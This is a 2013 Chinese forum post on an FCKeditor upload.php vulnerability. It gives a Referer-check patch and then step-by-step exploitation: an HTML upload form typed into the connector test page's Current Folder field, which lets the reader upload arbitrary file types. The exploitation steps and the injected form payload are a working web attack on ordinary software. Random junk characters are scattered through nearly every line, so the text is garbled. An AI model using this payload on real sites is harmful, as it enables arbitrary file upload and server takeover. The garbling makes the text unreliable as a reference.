漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php) c% P. ^4 c8 M1 |" V
网上给出的修复方案是
; ]* v/ U; l& A. U# h8 j修复方法,删除FCK编辑器用其他的编辑器
* o" t) q6 a5 \: [3 g _' j# g或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
+ V& ]% W! R/ Y0 F) V1 _) H在
, y0 t1 y9 D1 O& Grequire(‘config.php’);
8 T& B1 D8 S+ D3 [9 W% @ Zrequire(‘util.php’);; g0 J: n( [6 T0 j: f7 ~
的下面添加以下代码—————————–
% @% N4 x" R8 a0 l: j! q//防止外部提交+ x, ]( X8 l! O7 y* E
function outsidepost()
! U$ t1 M9 `% E2 ~& a{" Q6 k, }8 Y4 k) F8 W
$servername=$_SERVER['SERVER_NAME'];
* P5 s; T! \( y! f1 {$ L& O$sub_from=@$_SERVER['HTTP_REFERER'];9 f6 V0 \# H' a
$sub_len=strlen($servername);
& m8 U. T8 U; v% j9 f% C$checkfrom=substr($sub_from,7,$sub_len);
i ^2 _: V9 q/ r# N/ wif($checkfrom!=$servername){ H Q: \; T; y% P3 P) I* x
echo(“you don’t outsidepost!”);
8 k6 M, }$ c \, m& m: fexit;0 D5 P, y9 f) [" U$ ?* \9 j" n
}
6 {( N3 Q1 ?& k3 \2 p, l Q! F}; w& L. K2 [( G2 A X
outsidepost();
, p9 k! ~! H2 @( P) W0 b防止外部提交,但是没有防止内部提交,
/ Q% `: m2 x2 [ Y. Q利用方法:( ]1 x; }9 r( ^! B: w7 J5 |- W
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
* V/ h& L- s, n/ D9 V0 M2,在Current Folder 框输入3 r) |8 A1 V! |2 y) M
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>( w0 l# Q5 `1 O# q) ]" [+ p
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
4 d4 K5 E0 u# V h. |% {PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对